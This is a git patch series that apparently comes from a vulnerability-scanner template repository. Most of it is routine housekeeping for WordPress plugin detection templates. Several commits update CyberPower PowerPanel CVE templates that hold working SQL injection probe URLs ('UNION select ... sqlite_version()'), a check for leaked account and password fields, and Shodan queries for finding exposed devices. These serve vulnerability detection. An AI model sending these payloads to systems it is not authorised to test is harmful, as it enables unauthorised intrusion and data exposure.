b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022037f7bc6142f65677e2410da5658bed06aa8857c849d99eb85e744a692cdd2ea3022050da62f4034015d83760d715b54edc5c6b06cbbf827aa3f5b8ed408ddf62c776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 9a50db9d2c..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d5c65e59e8ab60937457a90d069ca72053cda1d24d2cb6c6fd056ecbeead7e06022100807d979374cb51b8dfa2dfccce25d7a024120b87079337b632e7eae5f72739be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index ee74bde5db..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022007128526a663decf50a0afbe5cce22e1a3c2b51b083ce896da27b987f78e0ca4022063aca4420fcc8935e563bdb454bf6d04c748f12ecc74b186c185573ce01ecf22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index d593db3678..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207b899facd590dd2eafc87b9f22f9ee1412cd9140ba4450faf1c116fb4ae25f2b022044fe5eeb5105e3f532497783b6b1235c2335b159c9d0bbf8c849d956854bf1ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 713c1b5fb9..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200582347e51ce859658dffd24b2675b958e63acb4a389875b13a6f24cf5e0842c022100cb3020133e9c1b65914db8814730b03de21d1a9dc43f97d00d61b93b20aaa896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a6bfca574b..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206f1914836392544d4a1cd7ba30af3785ac7edcdb566bd73a543187c5e9e435ad02203746cee9f3d3c70e75660a628ab62f3b73e9363cef9c94934d46408862baf594:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-logging.yaml b/http/technologies/wordpress/plugins/wp-mail-logging.yaml index abf10210e5..01a3669132 100644 --- a/http/technologies/wordpress/plugins/wp-mail-logging.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-logging.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bb2aebb90621f92bb2bd39e82455895e769e0bf188815d76d66955cce04b0c20022100ba630b1f9b8817f34ca6967d5e16430f29b15df37445ed190cac8af9666723c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 2f67d3665b..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d0152aaa5402c4f62fbc5dbd4bec74072961924b258663bd5d703594a618abd902210087ca17804d5d11ad17483a435a31dc26082cef3393e8660d23fdf6fcd8eb8d35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 165b92fea8..dc18db23b1 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009124189aedc3f1da5af94cf03b7479f39b39786dab06fa9dccc76b804c197799022100b5c588d54aa502b4df04c3aea9d8a5f27a920b63feb2781f03d0db8cd11f1e65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 28326921c2..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200b3eb6f014302074cfba93d23ce2943dd11017865a8995fa20aee648c0c32a36022074ee0b0d1681ac09ae23d9f79dbe016aa327fbe56d1ee136e7be35ba8328d256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 94b55f4519..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203f628362f3ab11923bfc049bb49d9c904321db82da1cb40fa4a52b3cf360d27402206b4390c5e6a25d0d650e9e230029a13e9291826d753c18f0ac9273a2ef4ff05b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index ea7356c552..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202c170f3becec7c6307e6a2ced2d02b071b1e1a1b6458d34daf099547c26845a3022100d53f9987daefa97ea3c40c21bc2832001049e8ffe3813bd712ef59185bbd4b49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index ccc202b9d5..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008bdcd687c45935db9ef350ad990e7dc2a72b1f4617c3bda7e953193a6545eaf30221009f1d9c79fc553b89d6ed91c4358febf76aa6cc4cad74533c716619a92964d4d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 759fbdd35c..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200cdd0cbf339975d26a5158995e243e841c0a3d9fa716c50272bbaba70caa744002200ef17f0b25c14be843860c260b44cbdbf55687954dfc0319be1b5f7f555987e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 24adbef73a..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022074a587e30fdd1160a39899a53cea25cc85877f6707018beea39ec1a6e4f7d73102206b3970dbe1a3eeb36c71b80351fb0834cec5dfdc805fb53dbdef97d6a909303a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 2f1ededa4c..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ebc65da1a3998fdcac0a0e33bf1df88e4a0f72e0598a311e6ba779e81f6e33c8022100a1f8458c4a15e63d73103189ca8dd679c2e95b2037f8a4c3326410477a3d5288:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index be548d442b..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ba551ab9bb9ee0d80a005473791ce10ecd5df8b8958d86a56f961aa7b05397e2022100b63e1eb792f90521593b3c5db6452532024f0f1602222edd3fe6d45ab16bcb81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 81ca273787..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206e67911787b029db15b360654650e817697a10d3b110e1c538c9c9e2eeee78fc0220369f08e99545a5c26442994d39ad944492031878267896d0d82d16a42e21ac6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index e7656bc887..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205735990fc2e7c35fdfac516d5f08258a0175ab8e0d9011bacf956ed536a88de8022100f90149495d57de6e482fd856f9b0ebf3fc8655817fba5c33cb1ee7b3fa8e8637:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 33d9287b26..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022032aee27de9fc78ede4ef48d2137a2e148b2958606427d763f1e3183e70f6707c022070484e754813b0381c24c23a44545030662222604588fb4078e23339fb38d267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 1a188ea92c..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022066ee180d9b2778367f5c6d42552c4ac4295239681d62b5c13a7d0cf56ca72123022100c9159d99b65b848f9d4e557dfccca38646cfde0dca0215e4f5370f2dd3e0343c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 2195aac22c..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210082e1c130db157b3821973fd5c3b5e19dc02fc6076ff7c6f7e2a081c51515a585022100b15a473a5162539b6d4513ed36642fffa48e6b209c7799ff64cdb79acb15a80c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index fa87a43aa6..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ae0c0144697876237451b8212b6b02543d9896ee91b939f28e077f434fece58e0220065b1a4f94497664b8db2c66e4f109b8f18f8bee00af82b962fe3d0ccaa65d62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f0ab121401..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210090bc8ead4b473fa306dc1a0b86791b6fea78cad5fcc56ed5d68c6eaa74e0c8ec022100936f820bc8c9a0d8a8839e715fb7cb0d9058565cff43921d366c887580361ddf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index da0564955c..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205088ee4fba5034f0ddfcdced33b1eb9d0ef47da32e033241cffd254b34f1b888022100f40a6dde29bb0282f78165ff64c5ff8c2f8a41d6ef0c90dd8b36351b6e2e243b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 2673920575..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d47b17eabdf6b4cc0aa6f22ea9f1a3362f270e8589d50148a861e29a16d80396022026cb84f13adb5ef1cd45ef93b820a84a4df3249b6aa10ee7fd90a9993636d832:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e8d0aeb8238d61578de72b724d5f0ec5f4ca30e1 Mon Sep 17 00:00:00 2001 From: Rishi <rishi@rxerium.com> Date: Wed, 16 Oct 2024 05:52:55 +0100 Subject: [PATCH 152/218] update contributors --- contributors.json | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/contributors.json b/contributors.json index 3c9f71c42b..f7b48176c7 100644 --- a/contributors.json +++ b/contributors.json @@ -1438,7 +1438,8 @@ "website": "https://pwn.by/noraj", "email": "" } - },{ + }, + { "author": "mabdullah22", "links": { "github": "https://www.github.com/maabdullah22", @@ -1447,5 +1448,15 @@ "website": "", "email": "" } + }, + { + "author": "rxerium", + "links": { + "github": "https://www.github.com/rxerium", + "twitter": "https://twitter.com/rxerium", + "linkedin": "", + "website": "https://rxerium.com", + "email": "rishi@rxerium.com" + } } ] From 2f365bfaa2246b884527921e72f10f13df8ef5c1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 16 Oct 2024 10:33:52 +0400 Subject: [PATCH 153/218] Update CVE-2024-32735.yaml --- http/cves/2024/CVE-2024-32735.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-32735.yaml b/http/cves/2024/CVE-2024-32735.yaml index 770b709b4f..22b1c35d95 100644 --- a/http/cves/2024/CVE-2024-32735.yaml +++ b/http/cves/2024/CVE-2024-32735.yaml @@ -1,7 +1,7 @@ id: CVE-2024-32735 info: - name: CyberPower - Missing Authentication for Critical Function + name: CyberPower - Missing Authentication author: DhiyaneshDK severity: critical description: | @@ -11,6 +11,7 @@ info: reference: - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote - https://www.tenable.com/security/research/tra-2024-14 + - https://nvd.nist.gov/vuln/detail/CVE-2024-32735 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -21,6 +22,7 @@ info: metadata: verified: true max-request: 1 + shodan-query: html:"<title>PDNU" tags: cve,cve2024,cyberpower,auth-bupass http: @@ -35,6 +37,7 @@ http: words: - '"account":' - '"passwd":' + - 'status":"success' condition: and - type: word From 326ad7a3c08fd1bac1bbc3f6985e98f7727e3114 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 16 Oct 2024 10:38:53 +0400 Subject: [PATCH 154/218] Update CVE-2024-32736.yaml --- http/cves/2024/CVE-2024-32736.yaml | 21 +++++++++++++-------- 1 file changed, 13 insertions(+), 8 deletions(-) diff --git a/http/cves/2024/CVE-2024-32736.yaml b/http/cves/2024/CVE-2024-32736.yaml index ad601ee2aa..9de1269f71 100644 --- a/http/cves/2024/CVE-2024-32736.yaml +++ b/http/cves/2024/CVE-2024-32736.yaml @@ -1,16 +1,17 @@ id: CVE-2024-32736 info: - name: CyberPower - SQL Injection in MCUDBHelper + name: CyberPower < v2.8.3 - SQL Injection author: DhiyaneshDk severity: high description: | - A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3. + A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to . impact: | An unauthenticated remote attacker can leak sensitive information via the "query_utask_verbose" function within MCUDBHelper. reference: - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote - https://www.tenable.com/security/research/tra-2024-14 + - https://nvd.nist.gov/vuln/detail/CVE-2024-32736 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -20,21 +21,25 @@ info: metadata: verified: true max-request: 1 + shodan-query: html:"PDNU" tags: cve,cve2024,cyberpower,sqli http: - - raw: - - | - GET /api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();-- HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--" matchers-condition: and matchers: + - type: regex + regex: + - '"code":"([0-9.]+)"' + - type: word part: body words: - - '"code":' - '"results":' + - '{"status":"finished' condition: and - type: word @@ -50,4 +55,4 @@ http: - type: regex group: 1 regex: - - '"code":(["0-9.]+)"' + - '"code":"([0-9.]+)"' From a03a1ea8d19e901d71822675a290ab46955794a5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 16 Oct 2024 10:40:41 +0400 Subject: [PATCH 155/218] Update CVE-2024-32737.yaml --- http/cves/2024/CVE-2024-32737.yaml | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/http/cves/2024/CVE-2024-32737.yaml b/http/cves/2024/CVE-2024-32737.yaml index 33ef509807..ff61f6d69e 100644 --- a/http/cves/2024/CVE-2024-32737.yaml +++ b/http/cves/2024/CVE-2024-32737.yaml @@ -1,16 +1,17 @@ id: CVE-2024-32737 info: - name: CyberPower - SQL Injection in MCUDBHelper (Contract Result Query) + name: CyberPower - SQL Injection author: DhiyaneshDk severity: high description: | - A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.  + A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3. impact: | An unauthenticated remote attacker can leak sensitive information via the "query_contract_result" function within MCUDBHelper. reference: - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote - https://www.tenable.com/security/research/tra-2024-14 + - https://nvd.nist.gov/vuln/detail/CVE-2024-32737 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -21,13 +22,13 @@ info: metadata: verified: true max-request: 1 + shodan-query: html:"PDNU" tags: cve,cve2024,cyberpower,sqli http: - - raw: - - | - GET /api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" matchers-condition: and matchers: @@ -51,4 +52,4 @@ http: - type: regex group: 1 regex: - - '"modifiedtime":(["0-9.]+)"' + - '"modifiedtime":"([0-9.]+)"' From f20f2d53d2a03ff6a9d07232af36aa869546926e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 16 Oct 2024 10:42:22 +0400 Subject: [PATCH 156/218] Update CVE-2024-32738.yaml --- http/cves/2024/CVE-2024-32738.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/http/cves/2024/CVE-2024-32738.yaml b/http/cves/2024/CVE-2024-32738.yaml index 4b01ad0d10..5eff492708 100644 --- a/http/cves/2024/CVE-2024-32738.yaml +++ b/http/cves/2024/CVE-2024-32738.yaml @@ -1,7 +1,7 @@ id: CVE-2024-32738 info: - name: CyberPower - SQL Injection in MCUDBHelper (PTask Lean Query) + name: CyberPower - SQL Injection author: DhiyaneshDk severity: high description: | @@ -11,6 +11,7 @@ info: reference: - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote - https://www.tenable.com/security/research/tra-2024-14 + - https://nvd.nist.gov/vuln/detail/CVE-2024-32738 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -21,13 +22,13 @@ info: metadata: verified: true max-request: 1 + shodan-query: html:"PDNU" tags: cve,cve2024,cyberpower,sqli http: - - raw: - - | - GET /api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" matchers-condition: and matchers: @@ -36,6 +37,7 @@ http: words: - ':"finished"' - '"success":' + - 'modifiedtime":' condition: and - type: word @@ -51,4 +53,4 @@ http: - type: regex group: 1 regex: - - '"modifiedtime":(["0-9.]+)"' + - '"modifiedtime":"([0-9.]+)"' From d5c413c20b1087c7bb4ea9684def1a9bd35e9026 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 16 Oct 2024 10:43:47 +0400 Subject: [PATCH 157/218] Update CVE-2024-32739.yaml --- http/cves/2024/CVE-2024-32739.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/http/cves/2024/CVE-2024-32739.yaml b/http/cves/2024/CVE-2024-32739.yaml index a719c25817..388dd4d2b7 100644 --- a/http/cves/2024/CVE-2024-32739.yaml +++ b/http/cves/2024/CVE-2024-32739.yaml @@ -1,7 +1,7 @@ id: CVE-2024-32739 info: - name: CyberPower - SQL Injection in MCUDBHelper (PTask Verbose Query) + name: CyberPower < v2.8.3 - SQL Injection author: DhiyaneshDk severity: high description: | @@ -11,6 +11,7 @@ info: reference: - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote - https://www.tenable.com/security/research/tra-2024-14 + - https://nvd.nist.gov/vuln/detail/CVE-2024-32739 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -20,13 +21,13 @@ info: metadata: verified: true max-request: 1 + shodan-query: html:"PDNU" tags: cve,cve2024,cyberpower,sqli http: - - raw: - - | - GET /api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();-- HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" matchers-condition: and matchers: @@ -50,4 +51,4 @@ http: - type: regex group: 1 regex: - - '"code":(["0-9.]+)"' + - '"code":"([0-9.]+)"' From ca8e76daa502ecbe452b0d896a923da291293201 Mon Sep 17 00:00:00 2001 From: ghost Date: Wed, 16 Oct 2024 06:44:13 +0000 Subject: [PATCH 158/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 80137a7902..96fbeab4d9 100644 --- a/.new-additions +++ b/.new-additions @@ -1,10 +1,12 @@ http/cves/2015/CVE-2015-8562.yaml http/cves/2018/CVE-2018-7192.yaml +http/cves/2018/CVE-2018-7193.yaml http/cves/2018/CVE-2018-7196.yaml http/cves/2021/CVE-2021-45811.yaml http/cves/2023/CVE-2023-1315.yaml http/cves/2023/CVE-2023-1317.yaml http/cves/2023/CVE-2023-1318.yaml +http/cves/2024/CVE-2024-32735.yaml http/cves/2024/CVE-2024-39713.yaml http/cves/2024/CVE-2024-43360.yaml http/cves/2024/CVE-2024-44349.yaml From 76937dff2164a295b36cc81764f428d486e8796b Mon Sep 17 00:00:00 2001 From: ghost Date: Wed, 16 Oct 2024 06:44:47 +0000 Subject: [PATCH 159/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 445 +++++++++++++++++++++-------------------- 1 file changed, 224 insertions(+), 221 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 93e88d393a..6924c6dfa4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -936,7 +936,7 @@ helpers/wordpress/plugins/ad-inserter.txt:412cf6c869a88a8a695efd21f4019fb5f95704 helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/admin-menu-editor.txt:4cf4800c61a8883b820676f651c058621e0c1b88 helpers/wordpress/plugins/adminimize.txt:ec155403800c88db49630516a63f68500f17d612 -helpers/wordpress/plugins/advanced-custom-fields.txt:e7da2a0745fb6eea51b8db7996a4fb6d78cdde22 +helpers/wordpress/plugins/advanced-custom-fields.txt:bfb073acf3b03ebaa08beba7bc10f858ff6cfa90 helpers/wordpress/plugins/akismet.txt:dc89f60f46ccf047183c71c1efe28ba794cbc8f8 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f helpers/wordpress/plugins/all-in-one-seo-pack.txt:11c21d25c5f721b65beda2f8949654938e0983ab @@ -944,10 +944,10 @@ helpers/wordpress/plugins/all-in-one-wp-migration.txt:9aff3c20ba6442ceb46269fcee helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:dc89f60f46ccf047183c71c1efe28ba794cbc8f8 helpers/wordpress/plugins/amp.txt:c78453b22ddacc88b67ece8b294a6b5930f15836 helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6fa2 -helpers/wordpress/plugins/astra-sites.txt:5e3c54ec1686b257c15fe3bd98af9e08d983b8ab 